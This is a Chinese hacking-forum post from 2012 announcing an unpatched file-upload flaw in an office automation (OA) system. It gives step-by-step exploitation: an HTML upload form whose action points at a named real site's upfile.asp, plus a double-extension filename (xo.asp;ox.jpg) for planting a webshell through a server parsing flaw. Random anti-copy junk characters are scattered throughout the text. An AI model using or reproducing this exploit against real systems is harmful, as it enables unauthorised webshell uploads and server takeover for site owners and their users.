找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2220|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞+ W- `  G! Q/ y8 A4 @: G$ E
6 F2 J0 [3 b' l( b5 x$ g' \
系统介绍:
1 G) n2 g& d6 {  g+ L/ G
6 s6 Q4 g% Z  ?! d全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。0 ?4 d6 j) |/ U1 u" z

- M7 x5 z& M+ F3 P( b" G' d4 L7 e主要功能:
9 ^) }7 m8 M9 O6 D公司通告
; C5 R& m% J2 V/ |7 N4 \* m! b工作计划
1 I) k  _/ [4 A通讯助理 6 ~; e, _/ R" @9 e; I. n7 t
客户资源 / }' R" D8 D& `. g$ a6 `! U
我的公文 3 v# d7 c/ \9 e4 k$ j4 _. t
公文传阅
% F- z; t/ R/ [) y' B/ K公共资源 % _( x4 P# h! o
资源预约 8 ^% n5 L4 g8 i. G" j" i" W4 m
今日考勤
" J$ |. e7 M2 b2 _个人计划 - u5 g% d: h1 A' ?/ M' o" w, {
个人通讯录 2 u, V; z; K6 w) |+ g8 T
个人基本档案 ( \, q9 @, F( v; D2 w: X1 G
未读邮件 0 [- I6 X$ M/ b# G
发邮件
9 u+ [% i- G$ f. o2 S收件夹
6 ]& l% {2 [( m, ~寄件夹
7 h6 Q4 Z; Q+ S/ D0 a. T2 x5 W, q网络硬盘 + ?! z  T  E, i: E' C1 q6 {
网络会议
8 W. k3 O! D# l% i* c# w* I9 G- |网络调查 5 W9 ^0 ^  g' P
交流论坛. W- _& O/ j2 w, M% n. q

3 z+ ]' X4 ]6 v% P& h有兴趣测试的朋友可以下源码看看
9 `* v8 I$ e( p
9 y+ a2 P8 n" f' k源码下载:
" Q- Y, R. n4 c. s4 h% U) M! I) k2 Y% ~& l% K5 R
http://www.mycodes.net/30/4750.htm$ I  H5 M0 f2 z$ N, r! O' ]# j
% }5 ?: ?" h* A, Z
漏洞介绍:: m1 u2 [0 w1 n' M5 z, C6 }/ k: F

( f3 l5 u; v: S由upfile.asp上传文件漏洞引起
1 R- a* F8 p& e" f" z9 y) ~5 g9 ?. j0 {! h& A! @- d2 Q3 a
测试方法:
$ F" j. M: K* v2 @0 ^9 {3 }7 G- q8 ]5 b% f( P) C1 o- M8 ^/ X9 D
使用名小子上传http://www.itlynn.com/upfile.asp即可. N# P/ P6 \" U( a0 h/ Q
: F0 K, s9 U0 ^6 {8 s( ~* e  i
如果upfile.asp文件被删除不存在。8 K/ }% s% z: H  H9 j. |% s

/ v1 [/ n; Y/ G  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp! Y3 ^8 I+ F* A' B" J7 @4 j

! d& m' Q  k7 X( c如果存在那么将如下代码保存为upfile.html。
* t/ g0 G+ X3 f7 B4 @) o6 l
" A8 P' Z6 O: Q" ]$ f- F% ]- A然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
' |5 {  K* P* B# c8 Y/ B8 B% b1 Q0 h( I
' B9 o! P( m/ f
2 |1 Z+ k: b1 v) T3 \6 F) I
01 <table border='0' align="center" cellpadding="5">
: f. s: Y$ ]  H
. f& y  E! a4 x! z. ~( ~4 }02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> , u5 c$ I* G% ]+ q- e
' u0 D  e- n0 O
03 <tr> ( N, n0 W% n+ b$ p

' e9 S& z. x+ c3 c+ n# K2 M04             <td>报错:</td>
, H5 m; n. x. s& H$ q" a$ O
: N* O- Z# {3 {* {' k: e05             <td><input type='radio' name='errnumber' value='0'>
7 @+ x9 I3 B2 U* Z/ X& J1 F7 p
" s  y' k( L6 ?. j, N06               自动更名
3 Q  m- [2 z& Y6 h- `
. A! j$ T1 g* J07               <input type='radio' name='errnumber' value='1' checked>
4 W! G5 B( x/ ]! ]0 _/ |  E2 T9 j
) l7 ]) y. }4 E  B# v08               报错方式
% C' _7 x9 G: z) L- A, w, h. g, F! R; p! }% T( d5 r4 j! v; ~5 s. D
09               <input type='radio' name='errnumber' value='2'> 3 u: x' e+ i& I1 u( ~

0 G. b( w$ v5 B: n) S  K10               直接覆盖</td> $ X( A$ x% B1 x9 L/ s
7 I) y3 d7 _9 J) Y
11           </tr> ! ^$ c$ f) e* e1 e3 u$ C
* I* M4 z6 c$ a& r3 v$ I
12           <tr> " d* X! P% B, r/ R

$ f, h3 C6 z  t7 M1 u6 Z  [- d, n13             <td>主题:</td> ) t- V  m& Y2 U4 d2 l2 n

: M9 D7 d; I! e% D6 D$ v3 T4 X4 w+ s14             <td><input type='text' name='filename' size='30'></td> ( _: [7 |3 h! S
0 W9 l1 D0 W/ g( [1 J
15           </tr>
4 B2 Z: _& H# ~: N% h/ `( |8 {/ O) p
16           <tr> ! d7 z- Z& M6 F3 U  D; I& _' P

, ~1 a' ]4 B  Z+ b17             <td>文件:</td>
; \) a7 y$ O! {3 q( X1 V5 h5 @1 ]4 i3 `! a4 f5 J- k( U4 [
18             <td><input type="file"name="fruit"size="30"></td>
% R3 j1 c* F# K  J3 ]4 g& D
) t$ C+ ]! `/ e0 X19           </tr> ( r7 r6 r6 R2 F6 F* `5 i
8 T" X% H. G7 N
20           <tr>
5 M* S3 f; l, A1 r' x1 j& W# l$ m3 V* I
21             <td valign='top'>简介:</td> + N2 I, X# g* L3 Y: ?

. Q& n0 N! ~0 X* }22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
3 x, L" l6 g0 [& l; p% y2 t' I5 c( K& T, D- \6 s
23           </tr>
: b7 i+ v4 ?0 O7 y
6 u4 e; M+ j  `# p) i8 f, H2 Z24   
: l+ r2 _/ [- U6 V$ l. e- O# j/ M2 [, K) C2 G
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> . |/ F1 O" O/ Q$ r+ [( M$ V

; i# u- x/ C& C+ U8 M+ D: H26           </tr> 0 v; I( I$ f" q/ u, j  p+ S  ?
' g2 J5 i! T8 w. Q: c* M- p( K
27         </form>
, P& ?8 _. d) ?5 A* t
- v+ U1 i, K6 E" o, }1 f% [6 v然后打开上传一个文件名为xo.asp;ox.jpg的文件。- M; o& m/ C2 l2 A& D! n

- T1 Z) @5 Y7 h$ G1 v0 g / X. h$ J4 ?! p* _: f
: ~. ]: _, C4 {" f% C2 F6 D, [. |
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
- O* M" g  s  K# z) ^8 ^4 P( V% p6 x7 `) _; W! n
此漏洞需要配合解析漏洞利用。
* m+ A; u7 ~, Q- R: X
, ^( _" t6 F! s* O; }- {. i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表